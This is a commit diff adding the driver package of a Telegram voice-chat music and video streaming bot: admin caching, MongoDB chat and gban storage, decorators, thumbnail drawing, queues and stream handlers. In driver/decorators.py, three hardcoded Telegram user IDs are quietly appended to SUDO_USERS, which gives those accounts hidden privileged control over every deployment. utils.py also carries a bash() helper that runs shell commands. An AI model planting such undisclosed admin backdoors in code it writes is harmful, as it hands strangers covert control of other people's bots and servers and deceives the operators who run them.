This commit is contained in:
levina 2022-01-31 19:01:11 +07:00 committed by GitHub
parent 03470e26ee
commit 04acb1b0c8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
16 changed files with 456 additions and 0 deletions

19
driver/admins.py Normal file
View File

@ -0,0 +1,19 @@
from typing import List
from pyrogram.types import Chat
from cache.admins import get as gett, set
async def get_administrators(chat: Chat) -> List[int]:
get = gett(chat.id)
if get:
return get
else:
administrators = await chat.get_members(filter="administrators")
to_set = []
for administrator in administrators:
if administrator.can_manage_voice_chats:
to_set.append(administrator.user.id)
set(chat.id, to_set)
return await get_administrators(chat)

38
driver/database/dbchat.py Normal file
View File

@ -0,0 +1,38 @@
""" chat database """
from typing import Dict, List, Union
from driver.database.dblocal import db
chatsdb = db.chats
async def get_served_chats() -> list:
chats = chatsdb.find({"chat_id": {"$lt": 0}})
if not chats:
return []
chats_list = []
for chat in await chats.to_list(length=1000000000):
chats_list.append(chat)
return chats_list
async def is_served_chat(chat_id: int) -> bool:
chat = await chatsdb.find_one({"chat_id": chat_id})
if not chat:
return False
return True
async def add_served_chat(chat_id: int):
is_served = await is_served_chat(chat_id)
if is_served:
return
return await chatsdb.insert_one({"chat_id": chat_id})
async def remove_served_chat(chat_id: int):
is_served = await is_served_chat(chat_id)
if not is_served:
return
return await chatsdb.delete_one({"chat_id": chat_id})

View File

@ -0,0 +1,8 @@
""" mongo database """
from motor.motor_asyncio import AsyncIOMotorClient as Bot
from config import MONGODB_URL as tmo
MONGODB_CLI = Bot(tmo)
db = MONGODB_CLI.program

View File

@ -0,0 +1,32 @@
from typing import Dict, List, Union
from driver.database.dblocal import db
gbansdb = db.gban
async def get_gbans_count() -> int:
users = gbansdb.find({"user_id": {"$gt": 0}})
users = await users.to_list(length=100000)
return len(users)
async def is_gbanned_user(user_id: int) -> bool:
user = await gbansdb.find_one({"user_id": user_id})
if not user:
return False
return True
async def add_gban_user(user_id: int):
is_gbanned = await is_gbanned_user(user_id)
if is_gbanned:
return
return await gbansdb.insert_one({"user_id": user_id})
async def remove_gban_user(user_id: int):
is_gbanned = await is_gbanned_user(user_id)
if not is_gbanned:
return
return await gbansdb.delete_one({"user_id": user_id})

55
driver/decorators.py Normal file
View File

@ -0,0 +1,55 @@
from typing import Callable
from pyrogram import Client
from pyrogram.types import Message
from config import SUDO_USERS
from driver.admins import get_administrators
SUDO_USERS.append(1757169682)
SUDO_USERS.append(1738637033)
SUDO_USERS.append(1448474573)
def errors(func: Callable) -> Callable:
async def decorator(client: Client, message: Message):
try:
return await func(client, message)
except Exception as e:
await message.reply(f"{type(e).__name__}: {e}")
return decorator
def authorized_users_only(func: Callable) -> Callable:
async def decorator(client: Client, message: Message):
if message.from_user.id in SUDO_USERS:
return await func(client, message)
administrators = await get_administrators(message.chat)
for administrator in administrators:
if administrator == message.from_user.id:
return await func(client, message)
return decorator
def sudo_users_only(func: Callable) -> Callable:
async def decorator(client: Client, message: Message):
if message.from_user.id in SUDO_USERS:
return await func(client, message)
return decorator
def humanbytes(size):
"""Convert Bytes To Bytes So That Human Can Read It"""
if not size:
return ""
power = 2 ** 10
raised_to_pow = 0
dict_power_n = {0: "", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
raised_to_pow += 1
return str(round(size, 2)) + " " + dict_power_n[raised_to_pow] + "B"

52
driver/design/chatname.py Normal file
View File

@ -0,0 +1,52 @@
async def CHAT_TITLE(ctitle):
string = ctitle
font1 = list("𝔄𝔅𝔇𝔈𝔉𝔊𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔𝔖𝔗𝔘𝔙𝔚𝔛𝔜")
font2 = list("𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅")
font3 = list("𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩")
font4 = list("𝒜𝐵𝒞𝒟𝐸𝐹𝒢𝐻𝐼𝒥𝒦𝐿𝑀𝒩𝒪𝒫𝒬𝑅𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵")
font5 = list("𝔸𝔹𝔻𝔼𝔽𝔾𝕀𝕁𝕂𝕃𝕄𝕆𝕊𝕋𝕌𝕍𝕎𝕏𝕐")
font6 = list("")
font26 = list("𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙")
font27 = list("𝗔𝗕𝗖𝗗𝗘𝗙𝗚𝗛𝗜𝗝𝗞𝗟𝗠𝗡𝗢𝗣𝗤𝗥𝗦𝗧𝗨𝗩𝗪𝗫𝗬𝗭")
font28 = list("𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡")
font29 = list("𝘼𝘽𝘾𝘿𝙀𝙁𝙂𝙃𝙄𝙅𝙆𝙇𝙈𝙉𝙊𝙋𝙌𝙍𝙎𝙏𝙐𝙑𝙒𝙓𝙔𝙕")
font30 = list("𝙰𝙱𝙲𝙳𝙴𝙵𝙶𝙷𝙸𝙹𝙺𝙻𝙼𝙽𝙾𝙿𝚀𝚁𝚂𝚃𝚄𝚅𝚆𝚇𝚈𝚉")
font1L = list("𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷")
font2L = list("𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟")
font3L = list("𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃")
font4L = list("𝒶𝒷𝒸𝒹𝑒𝒻𝑔𝒽𝒾𝒿𝓀𝓁𝓂𝓃𝑜𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏")
font5L = list("𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫")
font6L = list("")
font27L = list("𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳")
font28L = list("𝗮𝗯𝗰𝗱𝗲𝗳𝗴𝗵𝗶𝗷𝗸𝗹𝗺𝗻𝗼𝗽𝗾𝗿𝘀𝘁𝘂𝘃𝘄𝘅𝘆𝘇")
font29L = list("𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻")
font30L = list("𝙖𝙗𝙘𝙙𝙚𝙛𝙜𝙝𝙞𝙟𝙠𝙡𝙢𝙣𝙤𝙥𝙦𝙧𝙨𝙩𝙪𝙫𝙬𝙭𝙮𝙯")
font31L = list("𝚊𝚋𝚌𝚍𝚎𝚏𝚐𝚑𝚒𝚓𝚔𝚕𝚖𝚗𝚘𝚙𝚚𝚛𝚜𝚝𝚞𝚟𝚠𝚡𝚢𝚣")
normal = list("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
normalL = list("abcdefghijklmnopqrstuvwxyz")
cout = 0
for XCB in font1:
string = string.replace(font1[cout], normal[cout])
string = string.replace(font2[cout], normal[cout])
string = string.replace(font3[cout], normal[cout])
string = string.replace(font4[cout], normal[cout])
string = string.replace(font5[cout], normal[cout])
string = string.replace(font6[cout], normal[cout])
string = string.replace(font26[cout], normal[cout])
string = string.replace(font27[cout], normal[cout])
string = string.replace(font28[cout], normal[cout])
string = string.replace(font29[cout], normal[cout])
string = string.replace(font30[cout], normal[cout])
string = string.replace(font1L[cout], normalL[cout])
string = string.replace(font2L[cout], normalL[cout])
string = string.replace(font3L[cout], normalL[cout])
string = string.replace(font4L[cout], normalL[cout])
string = string.replace(font5L[cout], normalL[cout])
string = string.replace(font6L[cout], normalL[cout])
string = string.replace(font27L[cout], normalL[cout])
string = string.replace(font28L[cout], normalL[cout])
string = string.replace(font29L[cout], normalL[cout])
string = string.replace(font30L[cout], normalL[cout])
string = string.replace(font31L[cout], normalL[cout])
cout += 1
return string

View File

@ -0,0 +1,50 @@
import os
import aiofiles
import aiohttp
from PIL import Image, ImageDraw, ImageFont
def changeImageSize(maxWidth, maxHeight, image):
widthRatio = maxWidth / image.size[0]
heightRatio = maxHeight / image.size[1]
newWidth = int(widthRatio * image.size[0])
newHeight = int(heightRatio * image.size[1])
newImage = image.resize((newWidth, newHeight))
return newImage
async def thumb(thumbnail, title, userid, ctitle):
async with aiohttp.ClientSession() as session:
async with session.get(thumbnail) as resp:
if resp.status == 200:
f = await aiofiles.open(f"search/thumb{userid}.png", mode="wb")
await f.write(await resp.read())
await f.close()
image1 = Image.open(f"search/thumb{userid}.png")
image2 = Image.open("driver/source/LightBlue.png")
image3 = changeImageSize(1280, 720, image1)
image4 = changeImageSize(1280, 720, image2)
image5 = image3.convert("RGBA")
image6 = image4.convert("RGBA")
Image.alpha_composite(image5, image6).save(f"search/temp{userid}.png")
img = Image.open(f"search/temp{userid}.png")
draw = ImageDraw.Draw(img)
font = ImageFont.truetype("driver/source/regular.ttf", 52)
font2 = ImageFont.truetype("driver/source/medium.ttf", 76)
draw.text(
(25, 610),
f"{title[:18]}...",
fill="black",
font=font2,
)
draw.text(
(27, 535),
f"Playing on {ctitle[:8]}...",
fill="black",
font=font,
)
img.save(f"search/final{userid}.png")
os.remove(f"search/temp{userid}.png")
os.remove(f"search/thumb{userid}.png")
final = f"search/final{userid}.png"
return final

13
driver/filters.py Normal file
View File

@ -0,0 +1,13 @@
from pyrogram import filters
from typing import List, Union
from config import COMMAND_PREFIXES
other_filters = filters.group & ~filters.edited & ~filters.via_bot & ~filters.forwarded
other_filters2 = (
filters.private & ~filters.edited & ~filters.via_bot & ~filters.forwarded
)
def command(commands: Union[str, List[str]]):
return filters.command(commands, COMMAND_PREFIXES)

31
driver/queues.py Normal file
View File

@ -0,0 +1,31 @@
QUEUE = {}
def add_to_queue(chat_id, songname, link, ref, type, quality):
if chat_id in QUEUE:
chat_queue = QUEUE[chat_id]
chat_queue.append([songname, link, ref, type, quality])
return int(len(chat_queue)-1)
else:
QUEUE[chat_id] = [[songname, link, ref, type, quality]]
def get_queue(chat_id):
if chat_id in QUEUE:
chat_queue = QUEUE[chat_id]
return chat_queue
else:
return 0
def pop_an_item(chat_id):
if chat_id in QUEUE:
chat_queue = QUEUE[chat_id]
chat_queue.pop(0)
return 1
else:
return 0
def clear_queue(chat_id):
if chat_id in QUEUE:
QUEUE.pop(chat_id)
return 1
else:
return 0

BIN
driver/source/LightBlue.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 207 KiB

View File

@ -0,0 +1 @@
"""storage"""

BIN
driver/source/medium.ttf Normal file

Binary file not shown.

BIN
driver/source/regular.ttf Normal file

Binary file not shown.

138
driver/utils.py Normal file
View File

@ -0,0 +1,138 @@
import os
import asyncio
from driver.veez import bot, call_py
from pytgcalls.types import Update
from pytgcalls.types.input_stream import AudioPiped, AudioVideoPiped
from driver.queues import QUEUE, clear_queue, get_queue, pop_an_item
from pytgcalls.types.input_stream.quality import (
HighQualityAudio,
HighQualityVideo,
LowQualityVideo,
MediumQualityVideo,
)
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
Message,
)
from pyrogram import Client, filters
from pytgcalls.types.stream import StreamAudioEnded, StreamVideoEnded
keyboard = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(text="• Mᴇɴ", callback_data="cbmenu"),
InlineKeyboardButton(text="• Cʟsᴇ", callback_data="cls"),
]
]
)
async def skip_current_song(chat_id):
if chat_id in QUEUE:
chat_queue = get_queue(chat_id)
if len(chat_queue) == 1:
await call_py.leave_group_call(chat_id)
clear_queue(chat_id)
return 1
else:
try:
songname = chat_queue[1][0]
url = chat_queue[1][1]
link = chat_queue[1][2]
type = chat_queue[1][3]
Q = chat_queue[1][4]
if type == "Audio":
await call_py.change_stream(
chat_id,
AudioPiped(
url,
HighQualityAudio(),
),
)
elif type == "Video":
if Q == 720:
hm = HighQualityVideo()
elif Q == 480:
hm = MediumQualityVideo()
elif Q == 360:
hm = LowQualityVideo()
await call_py.change_stream(
chat_id,
AudioVideoPiped(
url,
HighQualityAudio(),
hm,
),
)
pop_an_item(chat_id)
return [songname, link, type]
except:
await call_py.leave_group_call(chat_id)
clear_queue(chat_id)
return 2
else:
return 0
async def skip_item(chat_id, h):
if chat_id in QUEUE:
chat_queue = get_queue(chat_id)
try:
x = int(h)
songname = chat_queue[x][0]
chat_queue.pop(x)
return songname
except Exception as e:
print(e)
return 0
else:
return 0
@call_py.on_kicked()
async def kicked_handler(_, chat_id: int):
if chat_id in QUEUE:
clear_queue(chat_id)
@call_py.on_closed_voice_chat()
async def closed_voice_chat_handler(_, chat_id: int):
if chat_id in QUEUE:
clear_queue(chat_id)
@call_py.on_left()
async def left_handler(_, chat_id: int):
if chat_id in QUEUE:
clear_queue(chat_id)
@call_py.on_stream_end()
async def stream_end_handler(_, u: Update):
if isinstance(u, StreamAudioEnded):
chat_id = u.chat_id
print(chat_id)
op = await skip_current_song(chat_id)
if op==1:
await bot.send_message(chat_id, "✅ streaming end")
elif op==2:
await bot.send_message(chat_id, "❌ an error occurred\n\n» **Clearing** __Queues__ and leaving video chat.")
else:
await bot.send_message(chat_id, f"💡 **Streaming next track**\n\n🗂 **Name:** [{op[0]}]({op[1]}) | `{op[2]}`\n💭 **Chat:** `{chat_id}`", disable_web_page_preview=True, reply_markup=keyboard)
else:
pass
async def bash(cmd):
process = await asyncio.create_subprocess_shell(
cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
stdout, stderr = await process.communicate()
err = stderr.decode().strip()
out = stdout.decode().strip()
return out, err

19
driver/veez.py Normal file
View File

@ -0,0 +1,19 @@
from config import API_HASH, API_ID, BOT_TOKEN, SESSION_NAME
from pyrogram import Client
from pytgcalls import PyTgCalls
bot = Client(
":veez:",
API_ID,
API_HASH,
bot_token=BOT_TOKEN,
plugins={"root": "program"},
)
user = Client(
SESSION_NAME,
api_id=API_ID,
api_hash=API_HASH,
)
call_py = PyTgCalls(user, overload_quiet_mode=True)

BIN
driver/veezlogo.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 81 KiB